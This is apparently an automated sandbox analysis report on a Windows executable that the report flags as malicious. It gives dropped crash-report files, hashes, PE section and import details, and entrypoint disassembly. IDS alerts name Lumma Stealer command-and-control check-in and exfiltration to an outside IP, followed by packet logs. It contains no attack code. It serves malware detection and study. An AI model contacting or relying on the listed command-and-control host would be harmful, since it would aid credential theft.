C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_uU6IvUPN39.exe_f093859966f3c1712e279d1ef72333ad3dbe5255_e95f9628_52a747ec-8ea1-4de0-b31c-cad117897a5b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0595824094751907
Encrypted:	false
SSDEEP:	96:M5FPrzbXLs9hBVon7Jf3QXIDcQAc6j7cEycw3a+HbHg/8BRTf3Oy1E45WAU6NCU6:QpXL2N0Ozofju3mFXzuiFcZZ24IO8e
MD5:	E1C7D7F00B950343ADE810DE913E16CD
SHA1:	CDB08F843892C80A71499CC46E0138D89406DE00
SHA-256:	8C76ACFA7842004266635277940D7EA494F4FD65E847C2483C557AFB817BE959
SHA-512:	1EAF1568A3058AD16974CB9F7B03C40D36E1C3B041D0C024C698C2F1B153DBF32B43F187235E5ED865B6A879153DB41357BC170DADDA631B9ADB9E9B4C1BA8DF
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.8.2.2.2.1.0.5.3.4.0.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.8.2.2.2.1.5.3.7.7.8.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.a.7.4.7.e.c.-.8.e.a.1.-.4.d.e.0.-.b.3.1.c.-.c.a.d.1.1.7.8.9.7.a.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.1.7.5.4.9.a.-.2.b.7.d.-.4.6.2.c.-.b.4.3.5.-.9.2.e.7.f.3.b.8.1.a.d.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.U.6.I.v.U.P.N.3.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.9.0.-.0.0.0.1.-.0.0.1.4.-.3.1.4.2.-.b.8.2.d.6.a.6.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.d.a.a.8.b.4.1.e.a.6.4.a.a.7.3.9.f.1.a.0.c.e.c.7.1.2.d.5.e.0.0.0.0.0.0.f.f.f.f.!.0.0.0.0.4.d.8.4.b.6.e.0.e.2.9.f.2.4.6.0.9.a.5.e.4.7.e.d.b.2.e.7.5.a.0.5.8.7.1.b.2.e.8.b.!.u.U.6.I.v.U.P.N.3.9...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6D6.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 9 07:43:41 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	107458
Entropy (8bit):	2.172513483899008
Encrypted:	false
SSDEEP:	768:JGugatTBK7+7Tx+LQxacxMyL7I19OTqgm:Q737+7TxwQxacxTSOTqgm
MD5:	602BCB710D5769682EC0A0595292C749
SHA1:	711E9D88A1BEFDD35C9FE643D7440A516040FA4D
SHA-256:	F9D5E63A38D74AE7EE877D7104B0FABD0C68862762D082240E4E18AF0EC24589
SHA-512:	EA95B7FC84ECC29C14492128048C0B1B3BA1F66DD784589C0DA7BD5467F58641E1C45163641A88BBA696C4B32DB3E1C15AC28575E404BD25EEDEA4BB9B6BDD6F
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......-~.g........................p...............h$...........N..........`.......8...........T...........pE..R^...........$...........&..............................................................................eJ......p'......GenuineIntel............T...........#~.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7D1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8358
Entropy (8bit):	3.7026109262173064
Encrypted:	false
SSDEEP:	192:R6l7wVeJ0jM6MmyT6YSPSU9hgmfGXqESpDG89bytsfNGm:R6lXJOM6CT6YKSU9hgmfGXjAymfV
MD5:	C13FF5A229186BA017C4215E4B14CC94
SHA1:	2C684F3953A3BABEBEE7CD890638E68A66B738FD
SHA-256:	A3E66FC0889444C6C8FEAFEA11CB01595A5B163BEDA827562A49927B76E308A2
SHA-512:	8474FB0188F6CCED73C166F4DA2417B5A97B58B1032A0F7E7F1CA052C30D0162FFEB17914A128B5BC48880E12EC758FDF2F063C5565047704D18C0490783A046
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7F1.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4623
Entropy (8bit):	4.50042854480038
Encrypted:	false
SSDEEP:	48:cvIwWl8zsIJg77aI9hmWpW8VYZYm8M4JarPOqFDuP+q8E2ORaAYPNgd:uIjfOI7/n7VdJaLA8i4Ngd
MD5:	33108E050005BA50DD376FF6B70B6712
SHA1:	E5011B6C118ADDEE3A8B2985B24E8EA679E6CF05
SHA-256:	6DA2E4E36710E87355030285BCEA956419B99A348A750EAD851020CEC0748817
SHA-512:	041D62EA58A57D6500CC0016A2DE7DED16F62DE5C17AAB90224A09F3008A7874D7E97FAE7D528BED35386E011714B2CC2551C822B33A8A9FE2A63286AD29CF3F
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="668086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372060403896835
Encrypted:	false
SSDEEP:	6144:LFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNViL:xV1QyWWI/glMM6kF77q
MD5:	985C8CA3FFCCABF77BE6E58A770E483C
SHA1:	44B92ADFDD3D346DE7E1349B99DC674A045EE3D1
SHA-256:	93F4BF05AFDC43089D1EB5C0D6714C0B1396C32076C07A487D6413173D7A9240
SHA-512:	39294609E9B175BDAD27AA2D776A4CE0ECD23C8E8458EC1D9B1C4422FC717B7EE073A4C706C0476899B073D0D507DDAED536E92F558B89C7544FDCD6B98E380C
Malicious:	false
Reputation:	low
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...3jb..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.548736087075785
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	uU6IvUPN39.exe
File size:	450'560 bytes
MD5:	a478b8943ef3239752d731e7290c4a3d
SHA1:	4d84b6e0e29f24609a5e47edb2e75a05871b2e8b
SHA256:	3e1364322293b0e928397a936ef70d087273fb886bb910ded4dbc8f7085f8c60
SHA512:	9fa68831404e3a3709d3c10c20e61f158f4b5375ce8f32753530ec40e57225f8d6075c088b5b1b6265242acd841b460abc71af813d2ed236acdbfa76d3361814
SSDEEP:	6144:xlYaIX3TE37YfH+LC/XgA06kEvts8Gd/3XyU1rO/dMn4dT6n:/YrAkekXb0l+sd/SXdMn
TLSH:	30A47C02B6FE3C14FAB767328E2A81E8265FF9F15E74625D2104779F08B2AB1C572741
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A]p. 3#. 3#. 3#.r.#. 3#.r.#. 3#.r.#. 3#..H#. 3#. 2#. 3#.r.#. 3#.r.#. 3#.r.#. 3#Rich. 3#........PE..L......d.................T.

File Icon


Icon Hash:	73a733b183a393e4

Static PE Info

General

Entrypoint:	0x40164d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64DDEBDD [Thu Aug 17 09:43:57 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	becaef8603902ffcda8786c9e684de4c

Entrypoint Preview

Instruction
call 00007F7FFCDD399Ah
jmp 00007F7FFCDCF53Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0044B8F8h], eax
mov dword ptr [0044B8F4h], ecx
mov dword ptr [0044B8F0h], edx
mov dword ptr [0044B8ECh], ebx
mov dword ptr [0044B8E8h], esi
mov dword ptr [0044B8E4h], edi
mov word ptr [0044B910h], ss
mov word ptr [0044B904h], cs
mov word ptr [0044B8E0h], ds
mov word ptr [0044B8DCh], es
mov word ptr [0044B8D8h], fs
mov word ptr [0044B8D4h], gs
pushfd
pop dword ptr [0044B908h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0044B8FCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0044B900h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0044B90Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0044B848h], 00010001h
mov eax, dword ptr [0044B900h]
mov dword ptr [0044B7FCh], eax
mov dword ptr [0044B7F0h], C0000409h
mov dword ptr [0044B7F4h], 00000001h
mov eax, dword ptr [0044A004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0044A008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [0000009Ch]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x48a1c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb9000	0x200e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x47000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4526b	0x45400	c0b499a76dfbf232479991bbcdf6fa0f	False	0.8047826884025271	data	7.410598344406821	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x47000	0x2300	0x2400	c8cdd1133bd5473ff5e715c997e8e9b7	False	0.3641493055555556	data	5.478094423685089	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4a000	0x67f7c	0x1800	7f6c655df91148d0c3a8a2093876c523	False	0.3370768229166667	data	3.3484363118514113	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.xidorow	0xb2000	0x53e5	0x4800	f9debe3f07be68533bf0295e3d2ba68a	False	0.002224392361111111	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.xiko	0xb8000	0x15a	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xb9000	0x200e8	0x20200	ffd7cc3ca6993211ea0c6e0ee75dfb9a	False	0.3314536721789883	data	4.398815233964421	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_CURSOR	0xd0600	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.4276315789473684
RT_CURSOR	0xd0748	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.7368421052631579
RT_CURSOR	0xd0878	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.06130705394190871
RT_CURSOR	0xd2e48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.31023454157782515
RT_ICON	0xb9b70	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.27238805970149255
RT_ICON	0xbaa18	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4223826714801444
RT_ICON	0xbb2c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5311059907834101
RT_ICON	0xbb988	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.565028901734104
RT_ICON	0xbbef0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.42271784232365145
RT_ICON	0xbe498	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.4959016393442623
RT_ICON	0xbee20	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.500886524822695
RT_ICON	0xbf2f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.3344882729211087
RT_ICON	0xc0198	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.39666064981949456
RT_ICON	0xc0a40	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	0.3888248847926267
RT_ICON	0xc1108	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.3959537572254335
RT_ICON	0xc1670	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.22136929460580912
RT_ICON	0xc3c18	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.24765478424015008
RT_ICON	0xc4cc0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.28114754098360656
RT_ICON	0xc5648	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.3120567375886525
RT_ICON	0xc5b28	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3307569296375267
RT_ICON	0xc69d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4611913357400722
RT_ICON	0xc7278	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5282258064516129
RT_ICON	0xc7940	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.5469653179190751
RT_ICON	0xc7ea8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.3025328330206379
RT_ICON	0xc8f50	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.3008196721311475
RT_ICON	0xc98d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.3528368794326241
RT_ICON	0xc9da8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.28171641791044777
RT_ICON	0xcac50	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.36597472924187724
RT_ICON	0xcb4f8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.3738479262672811
RT_ICON	0xcbbc0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.36921965317919075
RT_ICON	0xcc128	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.2598547717842324
RT_ICON	0xce6d0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.27790806754221387
RT_ICON	0xcf778	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.28524590163934427
RT_ICON	0xd0100	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.32358156028368795
RT_STRING	0xd3eb8	0x4c4	data	0.44344262295081965
RT_STRING	0xd4380	0x15e	data	0.5114285714285715
RT_STRING	0xd44e0	0x7d4	data	0.4241516966067864
RT_STRING	0xd4cb8	0x7b0	data	0.42327235772357724
RT_STRING	0xd5468	0x5f8	data	0.4443717277486911
RT_STRING	0xd5a60	0x6b6	data	0.43364377182770664
RT_STRING	0xd6118	0x66a	data	0.438489646772229
RT_STRING	0xd6788	0x6fa	data	0.4316909294512878
RT_STRING	0xd6e88	0x754	data	0.4253731343283582
RT_STRING	0xd75e0	0x422	data	0.4735349716446125
RT_STRING	0xd7a08	0x668	data	0.4329268292682927
RT_STRING	0xd8070	0x80e	data	0.4146459747817653
RT_STRING	0xd8880	0x668	data	0.4274390243902439
RT_STRING	0xd8ee8	0x1fe	data	0.49411764705882355
RT_ACCELERATOR	0xd05e0	0x20	data	1.15625
RT_GROUP_CURSOR	0xd0730	0x14	data	1.15
RT_GROUP_CURSOR	0xd2e20	0x22	data	1.0588235294117647
RT_GROUP_CURSOR	0xd3cf0	0x14	data	1.25
RT_GROUP_ICON	0xbf288	0x68	data	0.7115384615384616
RT_GROUP_ICON	0xd0568	0x76	data	0.6779661016949152
RT_GROUP_ICON	0xc5ab0	0x76	data	0.6779661016949152
RT_GROUP_ICON	0xc9d40	0x68	data	0.7211538461538461
RT_VERSION	0xd3d08	0x1b0	data	0.5833333333333334

Imports

DLL

Import

KERNEL32.dll

GetThreadContext, GetNumaNodeProcessorMask, SetDefaultCommConfigA, DebugActiveProcessStop, CreateProcessW, InterlockedIncrement, GetEnvironmentStringsW, CancelWaitableTimer, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, GetModuleHandleW, GetCurrentThread, GetDateFormatA, SetProcessPriorityBoost, GetVolumePathNameW, LoadLibraryW, GetConsoleAliasW, GetStartupInfoW, GetShortPathNameA, GetStartupInfoA, SetLastError, GetProcAddress, SearchPathA, GetAtomNameA, UnhandledExceptionFilter, LocalAlloc, DeleteTimerQueue, AddAtomA, FindAtomA, FoldStringA, OpenFileMappingW, FindFirstVolumeW, GetModuleHandleA, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetLastError, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetStdHandle, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, CreateFileA, CloseHandle, RaiseException

USER32.dll

GetProcessDefaultLayout

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T08:43:35.571305+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49706	104.21.96.1	443	TCP
2025-01-09T08:43:36.028845+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49706	104.21.96.1	443	TCP
2025-01-09T08:43:36.028845+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49706	104.21.96.1	443	TCP
2025-01-09T08:43:36.562488+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49707	104.21.96.1	443	TCP
2025-01-09T08:43:37.320591+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.8	49707	104.21.96.1	443	TCP
2025-01-09T08:43:37.320591+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49707	104.21.96.1	443	TCP
2025-01-09T08:43:38.043716+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49708	104.21.96.1	443	TCP
2025-01-09T08:43:38.622693+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.8	49708	104.21.96.1	443	TCP
2025-01-09T08:43:39.209528+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49709	104.21.96.1	443	TCP
2025-01-09T08:43:40.747263+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49710	104.21.96.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 08:43:35.078191996 CET	49706	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:35.078258991 CET	443	49706	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:35.078358889 CET	49706	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:35.081181049 CET	49706	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:35.081192017 CET	443	49706	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:35.571063042 CET	443	49706	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:35.571305037 CET	49706	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:35.573688030 CET	49706	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:35.573694944 CET	443	49706	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:35.573991060 CET	443	49706	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:35.614183903 CET	49706	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:35.623723984 CET	49706	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:35.623753071 CET	49706	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:35.623888969 CET	443	49706	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:36.028856039 CET	443	49706	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:36.028968096 CET	443	49706	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:36.029062986 CET	49706	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:36.059966087 CET	49706	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:36.059988022 CET	443	49706	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:36.072056055 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:36.072098970 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:36.072165012 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:36.072444916 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:36.072457075 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:36.562427044 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:36.562488079 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:36.580547094 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:36.580563068 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:36.580833912 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:36.595438957 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:36.595474958 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:36.595510006 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.320597887 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.320660114 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.320693016 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.320727110 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.320784092 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.320796967 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.320806980 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.320833921 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.320852995 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.320854902 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.320863008 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.320899963 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.321393013 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.325258970 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.325299978 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.325313091 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.325328112 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.325373888 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.411098003 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.411186934 CET	443	49707	104.21.96.1	192.168.2.8
